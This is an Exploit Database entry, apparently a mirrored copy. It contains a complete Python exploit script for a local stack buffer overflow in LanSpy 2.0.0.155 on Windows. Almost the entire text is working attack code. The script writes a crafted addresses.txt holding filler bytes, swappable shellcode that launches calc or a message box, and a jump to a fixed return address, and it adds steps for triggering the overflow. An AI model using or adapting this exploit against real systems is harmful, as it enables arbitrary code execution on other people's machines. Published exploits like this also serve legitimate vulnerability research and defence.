LanSpy 2.0.0.155 – Local Buffer Overflow

• Exploit Database
• 31 阅读

• 作者： n30m1nd
  日期： 2016-10-18
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/40567/

• #!/usr/bin/python
  
  ### LanSpy 2.0.0.155 - Buffer Overflow Exploit by n30m1nd ###
  
  # Date: 2016-10-18
  # Exploit Author: n30m1nd
  # Vendor Homepage: www.lantricks.com
  # Software Link: https://www.exploit-db.com/apps/42114d0f9e88ad76acaa0f145dabf923-lanspy_setup.exe
  # Version: LanSpy 2.0.0.155
  # Tested on: Tested on Win7 32bit and Win10 64 bit
  
  # Platforms
  # =========
  # Tested on Win7 32bit and Win10 64 bit
  # This exploit should work everywhere since the binary does not implement DEP nor ASLR
  
  # Credits
  # =======
  # Shouts to hyp3rlinx for the PoC:
  # 	https://www.exploit-db.com/exploits/38399/
  # 	http://hyp3rlinx.altervista.org/
  # And shouts to the crew at Offensive Security for their huge efforts on making
  #	the infosec community better
  
  # How to
  # ======
  # * Run this python script. It will generate an "addresses.txt" file.
  # * Replace this file in the root directory of your LanSpy.exe installation.
  # * Run LanSpy.exe and start the scan or do so by pressing F3.
  # 	- You can also call LanSpy.exe from the command line like the following and 
  # 		it will run the exploit straight away: echo n30 | C:\Path\To\LanSpy.exe
  
  # Exploit code
  # ============
  
  import struct
  
  # 32bit Alphanum-ish shellcodes
  # Bad chars detected: 00 2d 20
  
  # MessageBoxA at => 00404D80
  msgbox_shellcode = (
  "\x31\xC0\x50\x68"
  "\x70\x77\x6E\x64"
  "\x54\x5F\x50\x57"
  "\x57\x50\x35\xC4"
  "\x80\x80\x55\x35"
  "\x44\xCD\xC0\x55"
  "\x50\xC3"
  )
  
  # WinExec at -> 004EC4FF
  calc_shellcode = (
  "\x31\xC0\x50\x68"
  "\x63\x61\x6C\x63"
  "\x54\x5F\x50\x57"
  "\x35\xC3\x4E\xC3"
  "\x55\x35\x3C\x8A"
  "\x8D\x55\x50\xC3"
  )
  
  # Change the shellcode to be used here
  scde = calc_shellcode
  #scde = msgbox_shellcode
  
  # 126 are the bytes to jmp back with opcode \x74\x80 => ja -80h and it is where our shellcode resides
  junk = 'A'*(676-126) 
  if len(scde) > 126:
  	exit("[e] Shellcode is too big! Egghunter maybe? ;)")
  
  # 0040407D => jmp ecx inside LanSpy
  jecx = 'A'*(126-len(scde))+'\x74\x80CC'+struct.pack('<I', 0x0040407D)
  
  # Junk + Shellcode for calc + jump to our first stage jump which jumps to the second stage calc shellcode
  payl = junk + scde + jecx
  
  with open("addresses.txt", "wb") as f:
  f.write(payl)
  f.close()